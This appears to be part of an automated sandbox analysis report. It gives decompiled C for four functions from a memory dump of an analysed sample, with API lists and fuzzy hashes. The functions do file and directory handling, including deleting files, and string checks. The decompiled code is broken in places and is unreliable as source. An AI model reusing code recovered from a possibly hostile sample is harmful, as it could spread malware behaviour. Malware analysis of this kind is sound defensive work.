String ID:
API String ID: 2338897050-0
Opcode ID: c12616dacac91650ae6625dbe18ceacda9968700880066819307f5ef1f13030d
Instruction ID: dce9d890ddabb7e06413acf9577a441f6b72a8fcb193682a7ab86e5b4812530c
Opcode Fuzzy Hash: c12616dacac91650ae6625dbe18ceacda9968700880066819307f5ef1f13030d
Instruction Fuzzy Hash: 87314971205382ABD7219F66EC88FABBBEEEFC4754F004418F445C6290DB709806CA32

Uniqueness

Uniqueness Score: -1.00%

Function 006F7560, Relevance: 10.7, APIs: 7, Instructions: 171
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E006F7560(intOrPtr* __ecx) {
				intOrPtr _t33;
				WCHAR** _t34;
				void* _t38;
				WCHAR** _t44;
				WCHAR** _t45;
				void* _t46;
				void* _t48;
				WCHAR** _t54;
				WCHAR** _t62;
				WCHAR* _t64;
				WCHAR** _t69;
				WCHAR** _t72;
				intOrPtr* _t73;
				signed int _t94;
				WCHAR** _t97;
				void* _t98;
				WCHAR** _t99;
				intOrPtr* _t100;
				void* _t103;
				intOrPtr _t104;
				void* _t105;
				WCHAR*** _t106;

				_t100 = __ecx;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x34)))));
				_t33 = E006EC720();
				 *((intOrPtr*)(_t105 + 0xc)) = _t33;
				if(_t33 == 0) {
					return _t33;
				}
				_t34 = E006E5140(0x10);
				_t106 = _t105 + 4;
				_t72 = _t34;
				E006E91B0(_t34, 8);
				_t94 = 0;
				_t106[6] = 0;
				 *0x6f9d54(0x6f9bbc);
				if( *_t100 == 0) {
					L7:
					 *0x6f9d9c(0x6f9bbc);
					_t38 = E006EC430(_t72);
					_t102 = _t106[0xc];
					if(_t38 >= E006EC430(_t106[0xc]) || E006EC430(_t102) == 0) {
						L29:
						E006E91E0(_t106[3]);
						E006E1EA0(_t72);
						return L006F7400(_t72);
					} else {
						_t44 = 0;
						_t106[2] = _t72;
						do {
							_t106[4] = _t44;
							_t45 = E006E42F0(_t102, _t44);
							 *_t106 = _t45;
							if(_t45 != 0 &&  *( *_t106) != 0) {
								_t48 = E006EC430(_t72);
								_t98 = 0;
								if(_t48 == 0) {
									L17:
									if(_t98 != E006EC430(_t72)) {
										goto L28;
									}
									_t16 = _t100 + 0x14; // 0x2fa260
									if(E006EC430( *_t16) == 0) {
										L27:
										E006E9260(_t100, _t133, _t106[1], _t106[0xd]);
										Sleep(0x1388);
										goto L28;
									}
									_t103 = 0;
									_t106[1] = 1;
									do {
										_t18 = _t100 + 0x14; // 0x2fa260
										_t54 = E006E42F0( *_t18, _t103);
										if(_t54 != 0) {
											_t99 = _t54;
											_t73 = _t100;
											if(lstrcmpiW( *_t99,  *(_t106[0xd])) == 0 && lstrcmpiW(_t99[1],  *( *_t106)) == 0) {
												E006F4E70();
												_t89 =  <  ? 0 : _t106[1];
												_t106[1] =  <  ? 0 : _t106[1];
											}
											_t100 = _t73;
											_t72 = _t106[2];
										}
										_t25 = _t100 + 0x14; // 0x2fa260
										_t103 = _t103 + 1;
									} while (_t103 < E006EC430( *_t25));
									_t133 = _t106[1];
									_t102 = _t106[0xc];
									if(_t106[1] == 0) {
										goto L28;
									}
									goto L27;
								} else {
									goto L13;
								}
								do {
									L13:
									_t62 = E006E42F0(_t72, _t98);
									if(_t62 == 0) {
										goto L16;
									}
									_t64 =  *_t62;
									if(_t64 != 0 && lstrcmpiW( *(_t106[1]), _t64) == 0) {
										goto L17;
									}
									L16:
									_t98 = _t98 + 1;
								} while (_t98 < E006EC430(_t72));
								goto L17;
							}
							L28:
							_t97 =  &(_t106[4][0]);
							_t46 = E006EC430(_t102);
							_t44 = _t97;
						} while (_t97 < _t46);
						goto L29;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					_t4 = _t100 + 4; // 0x0
					_t104 =  *((intOrPtr*)( *_t4 + _t94 * 4));
					if(_t104 != 0 && lstrcmpiW( *(_t104 + 8), _t106[3]) == 0) {
						_t69 =  *(_t104 + 0x1c);
						if(_t69 != 0) {
							_t106[5] = _t69;
							E006E1200(_t72,  &(_t106[5]));
						}
					}
					_t94 = _t94 + 1;
				} while (_t94 <  *_t100);
				goto L7;
			}

0x006f756b
0x006f756d
0x006f756f
0x006f7576
0x006f757a
0x006f7761
0x006f7761
0x006f7582
0x006f7587
0x006f758a
0x006f7590
0x006f7595
0x006f7597
0x006f75a0
0x006f75a8
0x006f75e1
0x006f75e6
0x006f75ee
0x006f75f3
0x006f7602
0x006f773e
0x006f7742
0x006f774c
0x00000000
0x006f7617
0x006f7617
0x006f7619
0x006f761d
0x006f761f
0x006f7624
0x006f762b
0x006f762e
0x006f7642
0x006f7647
0x006f764b
0x006f767c
0x006f7685
0x00000000
0x00000000
0x006f768b
0x006f7695
0x006f770e
0x006f7718
0x006f7722
0x00000000
0x006f7722
0x006f7697
0x006f769c
0x006f76a0
0x006f76a0
0x006f76a4
0x006f76ab
0x006f76ad
0x006f76b3
0x006f76c3
0x006f76d3
0x006f76e9
0x006f76ec
0x006f76ec
0x006f76f0
0x006f76f2
0x006f76f2
0x006f76f6
0x006f76f9
0x006f76ff
0x006f7703
0x006f7708
0x006f770c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x006f764d
0x006f764d
0x006f7650
0x006f7657
0x00000000
0x00000000
0x006f7659
0x006f765d
0x00000000
0x00000000
0x006f7670
0x006f7672
0x006f7678
0x00000000
0x006f764d
0x006f7728
0x006f772e
0x006f772f
0x006f7736
0x006f7736
0x00000000
0x006f761d
0x00000000
0x00000000
0x00000000
0x006f75aa
0x006f75aa
0x006f75aa
0x006f75ad
0x006f75b2
0x006f75c5
0x006f75ca
0x006f75cc
0x006f75d7
0x006f75d7
0x006f75ca
0x006f75dc
0x006f75dd
0x00000000

APIs

RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F75A0
lstrcmpiW.KERNEL32(00000000,?), ref: 006F75BB
RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F75E6
lstrcmpiW.KERNEL32(?,?,00000000,00000000), ref: 006F7666
lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 006F76BF
lstrcmpiW.KERNEL32(?,00000000), ref: 006F76CD
Sleep.KERNEL32(00001388,?,?,00000000), ref: 006F7722

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: lstrcmpi$CriticalSection$EnterLeaveSleep
String ID:
API String ID: 1272173129-0
Opcode ID: 4970e4b4f764a9dd0c1ab9d5a77d711a4ab1725cfce9ec549902078f4665d8ff
Instruction ID: 705d5eace111424004e5520d6ba12d8516fb858b105d9c4b539977b678d00849
Opcode Fuzzy Hash: 4970e4b4f764a9dd0c1ab9d5a77d711a4ab1725cfce9ec549902078f4665d8ff
Instruction Fuzzy Hash: 75514A702093499FDB51AF2AD855A7AB6E7AF84780F40042CFA99C7351EF30DC01CB66

Uniqueness

Uniqueness Score: -1.00%

Function 006F5020, Relevance: 9.2, APIs: 6, Instructions: 233
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E006F5020(void* __ecx, void* __eflags) {
				void* _t91;
				void* _t92;
				void* _t94;
				void* _t98;
				intOrPtr _t102;
				struct _SECURITY_ATTRIBUTES* _t103;
				WCHAR* _t113;
				void* _t124;
				intOrPtr _t125;
				void* _t127;
				LPWSTR* _t129;
				signed int _t131;
				signed int _t132;
				void* _t135;
				intOrPtr _t143;
				intOrPtr _t151;
				void* _t153;
				WCHAR* _t157;
				void* _t158;
				WCHAR* _t159;
				void* _t160;
				signed int _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;

				_t129 = 0;
				_t153 = __ecx;
				 *((intOrPtr*)(_t163 + 8)) = 0;
				 *_t163 = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = 0;
				 *((intOrPtr*)(_t163 + 4)) = 0;
				E006F30C0(_t163 + 0x1c);
				_t159 = _t163 + 0x22;
				E006F4520(_t159, 0x50);
				_t164 = _t163 + 8;
				_t155 = _t164 + 0x4fe;
				if(GetFullPathNameW(_t159, 0x105, _t164 + 0x4fe, 0) == 0) {
					L29:
					_t78 =  *((intOrPtr*)(_t164 + 8));
					if( *((intOrPtr*)(_t164 + 8)) != 0) {
						_t78 = E006E91E0(_t78);
						_t164 = _t164 + 4;
					}
					E006F03D0(_t78);
					return _t129;
				}
				E006F4520(_t159, 0x51);
				_t165 = _t164 + 8;
				_push( *((intOrPtr*)(_t153 + 8)));
				E006F68E0(_t165 + 0xea, 0x105, _t159, _t155);
				_t164 = _t165 + 0x14;
				_t129 = 1;
				if( *((intOrPtr*)(_t153 + 0x24)) > 0) {
					_t131 = 0;
					do {
						 *(_t164 + 0xc) = 0;
						_t160 = _t153;
						E006F4520(_t164 + 0x26, 0x23);
						_t166 = _t164 + 8;
						 *(_t166 + 0x18) = _t131;
						_t132 = _t131 << 4;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x2c)) + _t132 + 4)));
						_t153 = _t160;
						E006F68E0(_t166 + 0x304, 0x105, _t164 + 0x26, _t166 + 0xee);
						_t167 = _t166 + 0x14;
						_t91 = E006F0230(_t166 + 0x304, 0, 0, _t167 + 0xc);
						_t164 = _t167 + 0x10;
						if(_t91 == 0) {
							 *(_t164 + 0xc) = 0;
						}
						_t92 = E006F4E70();
						_t162 = _t132;
						if(_t92 -  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 0xc)) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 8) * 0x3c || E006F4E70() -  *(_t164 + 0xc) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 8) * 0x3c) {
							_t94 = _t164 + 4;
							if( *((intOrPtr*)(_t164 + 0x71c)) != 0) {
								E006F7BE0(_t164 + 0x2fc, _t164 + 0x2fc, _t164 + 4, _t94);
								_t169 = _t164 + 0xc;
								E006F7C90( *((intOrPtr*)(_t169 + 4)),  *((intOrPtr*)(_t169 + 4)));
								_t164 = _t169 + 8;
							}
							goto L15;
						} else {
							_t124 = E006E97E0( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)));
							_t135 = _t164 + 4;
							if(_t124 == 0) {
								L15:
								_t95 =  *_t164;
								if( *_t164 != 0) {
									_t98 = E006F6F80(_t95,  *(_t164 + 0xc), _t164 + 0xc, _t164 + 0x10);
									_t164 = _t164 + 0x10;
									if(_t98 != 0) {
										if( *0x6f9c04 == 0) {
											if(GetFileAttributesW(_t164 + 0xea) == 0xffffffff) {
												_t113 = _t164 + 0xea;
												_t157 = _t113;
												PathRemoveBackslashW(_t113);
												CreateDirectoryW(_t157, 0);
												PathAddBackslashW(_t157);
											}
											E006F7C90( *((intOrPtr*)(_t164 + 4)),  *((intOrPtr*)(_t164 + 4)));
											_t168 = _t164 + 8;
											E006E6270(_t168 + 0x2fc, _t168 + 0x2fc,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t168 + 4)));
											_t164 = _t168 + 0xc;
										}
										_t102 = E006F4E70();
										_t143 =  *((intOrPtr*)(_t153 + 0x2c));
										 *((intOrPtr*)(_t143 + _t162 + 0xc)) = _t102;
										_t103 =  *(_t164 + 0x10);
										_t151 =  *((intOrPtr*)(_t164 + 8));
										_t164 = _t164 - 0x10;
										 *((intOrPtr*)(_t164 + 4)) =  *((intOrPtr*)(_t143 + _t162));
										 *(_t164 + 0xc) = _t103;
										 *((intOrPtr*)(_t164 + 8)) = _t151;
										E006EE0F0(_t153);
										_t105 =  *((intOrPtr*)(_t164 + 8));
										if( *((intOrPtr*)(_t164 + 8)) != 0) {
											E006E91E0(_t105);
											_t164 = _t164 + 4;
											 *((intOrPtr*)(_t164 + 8)) = 0;
											 *(_t164 + 0x10) = 0;
										}
									}
									_t99 =  *_t164;
									if( *_t164 != 0) {
										E006E91E0(_t99);
										_t164 = _t164 + 4;
										 *_t164 = 0;
										 *((intOrPtr*)(_t164 + 4)) = 0;
									}
								}
								goto L25;
							}
							_t125 =  *((intOrPtr*)(_t153 + 0x48));
							E006F5C00( *((intOrPtr*)(_t125 + 8)));
							if(_t125 == 0) {
								goto L25;
							} else {
								_t158 = 0;
								 *((intOrPtr*)(_t164 + 0x14)) = _t125;
								while(1) {
									_push(_t135);
									_push(_t164 + 4);
									_t127 = E006F4610( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)), 5,  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 4)));
									_t164 = _t164 + 0x14;
									if(_t127 != 0) {
										break;
									}
									Sleep(0xbb8);
									_t158 = _t158 + 1;
									if(_t158 < 2) {
										continue;
									}
									break;
								}
								E006E91E0( *((intOrPtr*)(_t164 + 0x14)));
								_t164 = _t164 + 4;
								goto L15;
							}
						}
						L25:
						_t131 =  *((intOrPtr*)(_t164 + 0x18)) + 1;
					} while (_t131 <  *((intOrPtr*)(_t153 + 0x24)));
					_t96 =  *_t164;
					if( *_t164 != 0) {
						E006E91E0(_t96);
						_t164 = _t164 + 4;
					}
					_t129 = 1;
				}
			}

0x006f502a
0x006f502c
0x006f5032
0x006f5036
0x006f5039
0x006f503d
0x006f5041
0x006f5046
0x006f504d
0x006f5052
0x006f5055
0x006f506c
0x006f52ef
0x006f52ef
0x006f52f5
0x006f52f8
0x006f52fd
0x006f52fd
0x006f5304
0x006f5315
0x006f5315
0x006f5075
0x006f507a
0x006f5084
0x006f508f
0x006f5094
0x006f5099
0x006f509e
0x006f50a4
0x006f50a6
0x006f50a8
0x006f50b2
0x006f50b7
0x006f50bc
0x006f50c2
0x006f50c6
0x006f50c9
0x006f50e2
0x006f50e7
0x006f50ec
0x006f50f7
0x006f50fc
0x006f5101
0x006f5103
0x006f5103
0x006f510b
0x006f5113
0x006f5120
0x006f51b3
0x006f51b7
0x006f51c7
0x006f51cc
0x006f51d7
0x006f51dc
0x006f51dc
0x00000000
0x006f513b
0x006f5141
0x006f5148
0x006f514c
0x006f51df
0x006f51df
0x006f51e4
0x006f51f9
0x006f51fe
0x006f5203
0x006f5210
0x006f5223
0x006f5225
0x006f522c
0x006f522f
0x006f5238
0x006f523f
0x006f523f
0x006f524d
0x006f5252
0x006f5265
0x006f526a
0x006f526a
0x006f526d
0x006f5272
0x006f5275
0x006f5279
0x006f527d
0x006f5284
0x006f5287
0x006f528d
0x006f5291
0x006f5295
0x006f529a
0x006f52a0
0x006f52a3
0x006f52a8
0x006f52ad
0x006f52b1
0x006f52b1
0x006f52a0
0x006f52b5
0x006f52ba
0x006f52bd
0x006f52c2
0x006f52c7
0x006f52ca
0x006f52ca
0x006f52ba
0x00000000
0x006f51e4
0x006f5152
0x006f5158
0x006f515f
0x00000000
0x006f5165
0x006f5165
0x006f5167
0x006f516b
0x006f5171
0x006f5176
0x006f5180
0x006f5185
0x006f518a
0x00000000
0x00000000
0x006f5191
0x006f5197
0x006f519b
0x00000000
0x00000000
0x00000000
0x006f519b
0x006f51a1
0x006f51a6
0x00000000
0x006f51a6
0x006f515f
0x006f52ce
0x006f52d2
0x006f52d3
0x006f52dc
0x006f52e1
0x006f52e4
0x006f52e9
0x006f52e9
0x006f52ee
0x006f52ee

APIs

GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006F5064

Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15

Part of subcall function 006F0230: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006F0248
Part of subcall function 006F0230: GetFileTime.KERNEL32(00000000,?,?,?,?,?,006F0385,00000000), ref: 006F0267
Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F028C
Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02B0
Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02D3
Part of subcall function 006F0230: CloseHandle.KERNEL32(00000000), ref: 006F02E5

Sleep.KERNEL32(00000BB8), ref: 006F5191
GetFileAttributesW.KERNEL32(?), ref: 006F521A
PathRemoveBackslashW.SHLWAPI(?), ref: 006F522F
CreateDirectoryW.KERNEL32(?,00000000), ref: 006F5238
PathAddBackslashW.SHLWAPI(?), ref: 006F523F

Part of subcall function 006F7BE0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F7C03
Part of subcall function 006F7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 006F7C1D
Part of subcall function 006F7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 006F7C28
Part of subcall function 006F7BE0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7C4A
Part of subcall function 006F7BE0: CloseHandle.KERNEL32(00000000), ref: 006F7C6D

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$CreatePath_aulldiv$BackslashCloseHandlePointer$AttributesByteCharDirectoryFullMultiNameReadRemoveSleepTimeWide
String ID:
API String ID: 2481069558-0
Opcode ID: f88055cc64d2c3f3778c61ae76e4cfea90d1375e177c0a37729359c4fcde7bdf
Instruction ID: 2a4252c09a59079e343974639da44f63c7bca5fb72cbded6120852705c6620a1
Opcode Fuzzy Hash: f88055cc64d2c3f3778c61ae76e4cfea90d1375e177c0a37729359c4fcde7bdf
Instruction Fuzzy Hash: C581C7B1904309AFC750EF64DC85AABB7EAAF44344F00492DFA49C7252EB30ED04CB66

Uniqueness

Uniqueness Score: -1.00%

Function 006ED6B0, Relevance: 9.2, APIs: 6, Instructions: 161
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E006ED6B0(signed int* __ecx) {
				signed int _t38;
				signed int _t41;
				signed int _t43;
				signed int _t47;
				WCHAR* _t48;
				signed int _t53;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				signed int* _t83;
				signed int* _t84;
				signed int _t85;
				signed int _t88;
				WCHAR* _t89;
				void* _t91;
				signed int* _t92;
				signed int _t93;
				signed int** _t94;
				signed int** _t97;
				signed int** _t98;
				signed int** _t99;

				_t92 = _t94[0x1c3];
				_t84 = __ecx;
				if(_t92 != 0) {
					 *0x6f9d54(0x6f9bbc);
				}
				_t38 =  *_t84;
				if(_t38 == 0) {
					L6:
					_t85 = 0;
				} else {
					_t74 = _t94[0x1c4];
					_t82 = _t94[0x1c2];
					_t80 = _t84[1];
					_t71 = 0;
					 *_t94 = _t84;
					while( *((intOrPtr*)(_t80 + _t71 * 4)) != _t82) {
						_t71 = _t71 + 1;
						if(_t71 < _t38) {
							continue;
						} else {
							goto L6;
						}
						goto L28;
					}
					__eflags = _t74;
					if(_t74 == 0) {
						L18:
						__eflags = _t82;
						if(_t82 != 0) {
							goto L19;
						}
					} else {
						_t78 =  *0x6f9c04; // 0x0
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						} else {
							_push( *((intOrPtr*)(_t82 + 8)));
							_t47 = E006EC720();
							__eflags = _t47;
							if(__eflags != 0) {
								_t88 = _t47;
								_t48 = E006F0520(__eflags, _t47);
								__eflags = _t48;
								if(_t48 != 0) {
									_t94[2] = _t88;
									_t94[1] = _t48;
									DeleteFileW(_t48);
									_t89 =  &(_t94[3]);
									E006F4520(_t89, 0x50);
									_t97 =  &(_t94[2]);
									_t53 = GetFullPathNameW(_t89, 0x105,  &(_t97[0x13a]), 0);
									__eflags = _t53;
									if(_t53 != 0) {
										E006F4520( &(_t97[4]), 0x51);
										_t98 =  &(_t97[2]);
										_push( *((intOrPtr*)(_t82 + 8)));
										E006F68E0( &(_t98[0x35]), 0x105,  &(_t97[4]),  &(_t98[0x13b]));
										_t97 =  &(_t98[5]);
										__eflags =  *(_t82 + 0x24);
										if( *(_t82 + 0x24) > 0) {
											_t93 = 0;
											__eflags = 0;
											_t91 = 4;
											do {
												E006F4520( &(_t97[4]), 0x23);
												_t99 =  &(_t97[2]);
												_push( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x2c)) + _t91)));
												E006F68E0( &(_t99[0xbc]), 0x105,  &(_t99[5]),  &(_t99[0x36]));
												_t97 =  &(_t99[5]);
												DeleteFileW( &(_t97[0xb8]));
												_t93 = _t93 + 1;
												_t91 = _t91 + 0x10;
												__eflags = _t93 -  *(_t82 + 0x24);
											} while (_t93 <  *(_t82 + 0x24));
										}
										RemoveDirectoryW( &(_t97[0x35]));
										_t92 = _t97[0x1c3];
									}
									E006E91E0(_t97[1]);
									_t94 =  &(_t97[1]);
									_t88 = _t94[2];
								}
								E006E91E0(_t88);
								_t94 =  &(_t94[1]);
							}
							L19:
							E006EB860(_t82);
							L006F7400(_t82);
							_t94 =  &(_t94[1]);
							_t38 =  *( *_t94);
						}
					}
					_t83 =  *_t94;
					_t75 = _t38 - 1;
					__eflags = _t71 - _t75;
					 *_t83 = _t75;
					if(_t71 < _t75) {
						_t72 = _t71 + 1;
						__eflags = _t72;
						do {
							 *((intOrPtr*)(_t83[1] + _t72 * 4 - 4)) =  *((intOrPtr*)(_t83[1] + _t72 * 4));
							_t72 = _t72 + 1;
							__eflags = _t38 - _t72;
						} while (_t38 != _t72);
					}
					_t41 = _t83[1];
					__eflags = _t75;
					if(_t75 == 0) {
						E006E91E0(_t41);
						_t43 = 0;
						__eflags = 0;
						goto L27;
					} else {
						_t43 = E006E3180(_t75 << 2, _t41);
						__eflags = _t43;
						if(_t43 != 0) {
							L27:
							_t83[1] = _t43;
							_t85 = 1;
							__eflags = 1;
						} else {
							goto L6;
						}
					}
				}
				L28:
				if(_t92 != 0) {
					 *0x6f9d9c(0x6f9bbc);
				}
				return _t85;
			}

0x006ed6ba
0x006ed6c1
0x006ed6c5
0x006ed6cc
0x006ed6cc
0x006ed6d2
0x006ed6d6
0x006ed6f8
0x006ed6f8
0x006ed6d8
0x006ed6d8
0x006ed6df
0x006ed6e6
0x006ed6e9
0x006ed6eb
0x006ed6ee
0x006ed6f3
0x006ed6f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x006ed6f6
0x006ed6ff
0x006ed701
0x006ed82e
0x006ed82e
0x006ed830
0x00000000
0x00000000
0x006ed707
0x006ed707
0x006ed70d
0x006ed70f
0x00000000
0x006ed715
0x006ed715
0x006ed718
0x006ed71d
0x006ed71f
0x006ed725
0x006ed728
0x006ed72d
0x006ed72f
0x006ed735
0x006ed739
0x006ed73e
0x006ed744
0x006ed74b
0x006ed750
0x006ed763
0x006ed769
0x006ed76b
0x006ed77a
0x006ed77f
0x006ed789
0x006ed79b
0x006ed7a0
0x006ed7a3
0x006ed7a7
0x006ed7a9
0x006ed7a9
0x006ed7ab
0x006ed7b0
0x006ed7b7
0x006ed7bc
0x006ed7c2
0x006ed7df
0x006ed7e4
0x006ed7ef
0x006ed7f5
0x006ed7f6
0x006ed7f9
0x006ed7f9
0x006ed7b0
0x006ed806
0x006ed80c
0x006ed80c
0x006ed817
0x006ed81c
0x006ed81f
0x006ed81f
0x006ed824
0x006ed829
0x006ed829
0x006ed832
0x006ed834
0x006ed83a
0x006ed83f
0x006ed845
0x006ed845
0x006ed70f
0x006ed847
0x006ed84a
0x006ed84d
0x006ed84f
0x006ed851
0x006ed853
0x006ed853
0x006ed854
0x006ed85a
0x006ed85e
0x006ed85f
0x006ed85f
0x006ed854
0x006ed863
0x006ed866
0x006ed868
0x006ed881
0x006ed889
0x006ed889
0x00000000
0x006ed86a
0x006ed86f
0x006ed877
0x006ed879
0x006ed88b
0x006ed88d
0x006ed890
0x006ed890
0x006ed87b
0x00000000
0x006ed87b
0x006ed879
0x006ed868
0x006ed891
0x006ed893
0x006ed89a
0x006ed89a
0x006ed8ac

APIs

RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006ED6CC
DeleteFileW.KERNEL32(00000000,00000000,?), ref: 006ED73E
GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006ED763
DeleteFileW.KERNEL32(?), ref: 006ED7EF
RemoveDirectoryW.KERNEL32(?), ref: 006ED806
RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006ED89A

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CriticalDeleteFileSection$DirectoryEnterFullLeaveNamePathRemove
String ID:
API String ID: 328185309-0
Opcode ID: c898cfe6f516189def7ecad6b8f24f898669ec5f6377e5c2b75e1dd5c831e632
Instruction ID: fa968d5718c3c07d2196704e92dc421880988ea60fd59273b60315665d6a004b
Opcode Fuzzy Hash: c898cfe6f516189def7ecad6b8f24f898669ec5f6377e5c2b75e1dd5c831e632
Instruction Fuzzy Hash: 7F51E4B5905345ABCB20EF65DC45BABB3AAEF44304F04042DFA49C3341EB70E914CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 006F7410, Relevance: 9.1, APIs: 6, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E006F7410(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v1040;
				struct _OVERLAPPED* _v1044;
				intOrPtr _t25;
				void* _t27;
				long _t29;
				void* _t34;
				long _t41;
				intOrPtr _t42;
				short* _t43;
				void* _t44;
				void* _t45;
				signed int _t46;
				signed int _t47;
				void* _t49;
				signed int _t50;
				signed int _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				DWORD* _t55;

				_t53 = _a12;
				_t25 = _a8;
				_t42 = _a4;
				_t44 = 0xfffffc00;
				_v1044 = 0;
				while(1) {
					_t50 =  *(_t42 + _t44 + 0x400) & 0x0000ffff;
					if(_t50 == 0) {
						break;
					}
					 *(_t54 + _t44 + 0x404) = _t50;
					_t44 = _t44 + 2;
					if(_t44 != 0) {
						continue;
					} else {
						 *((short*)(_t54 + _t44 + 0x402)) = 0;
					}
					L20:
					return 0;
				}
				 *(_t54 + _t44 + 0x404) = 0;
				_t43 =  &_v1040;
				_t45 = 0x200;
				while( *_t43 != 0) {
					_t43 = _t43 + 2;
					_t45 = _t45 - 1;
					if(_t45 != 0) {
						continue;
					} else {
					}
					goto L20;
				}
				_t46 = 0;
				while(1) {
					_t51 = _t46;
					_t47 =  *(_t25 + _t46 * 2) & 0x0000ffff;
					if(_t47 == 0) {
						break;
					}
					 *(_t43 + _t51 * 2) = _t47;
					_t17 = _t51 + 1; // 0x1
					_t46 = _t17;
					if(_t45 != _t46) {
						continue;
					} else {
						 *(_t43 + _t51 * 2) = 0;
					}
					goto L20;
				}
				 *(_t43 + _t51 * 2) = 0;
				_t27 = CreateFileW( &_v1040, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t27 != 0xffffffff) {
					_t52 = _t27;
					_t29 = SetFilePointer(_t27, 0, 0, 2);
					if(_t29 == 0xffffffff) {
						L19:
						CloseHandle(_t52);
					} else {
						_t41 = _t29;
						SetFilePointer(_t52, 0, 0, 0);
						_t23 = _t41 - 1; // -1
						if(_t23 > 0x4ffffe) {
							goto L19;
						} else {
							_t34 = E006E3180(_t41, 0);
							_t55 = _t54 + 8;
							if(_t34 == 0) {
								goto L19;
							} else {
								_t49 = _t34;
								if(ReadFile(_t52, _t49, _t41, _t55, 0) == 0) {
									E006E91E0(_t49);
									goto L19;
								} else {
									CloseHandle(_t52);
									_push(_t53);
									_push(_v1044);
									_push(_t49);
									E006F1240();
									E006E91E0(_t49);
								}
							}
						}
					}
				}
				goto L20;
			}

0x006f741a
0x006f7421
0x006f7428
0x006f742f
0x006f7434
0x006f743b
0x006f743b
0x006f7446
0x00000000
0x00000000
0x006f7448
0x006f7450
0x006f7453
0x00000000
0x006f7455
0x006f7455
0x006f7455
0x006f7550
0x006f755c
0x006f755c
0x006f7464
0x006f746e
0x006f7472
0x006f7477
0x006f747d
0x006f7480
0x006f7481
0x00000000
0x00000000
0x006f7483
0x00000000
0x006f7481
0x006f7488
0x006f748a
0x006f748a
0x006f748c
0x006f7493
0x00000000
0x00000000
0x006f7495
0x006f7499
0x006f7499
0x006f749e
0x00000000
0x006f74a0
0x006f74a0
0x006f74a0
0x00000000
0x006f749e
0x006f74b1
0x006f74c8
0x006f74d1
0x006f74d3
0x006f74da
0x006f74e3
0x006f7549
0x006f754a
0x006f74e5
0x006f74e5
0x006f74ed
0x006f74f3
0x006f74fb
0x00000000
0x006f74fd
0x006f7500
0x006f7505
0x006f750a
0x00000000
0x006f750c
0x006f750c
0x006f751e
0x006f7541
0x00000000
0x006f7520
0x006f7521
0x006f7527
0x006f7528
0x006f752c
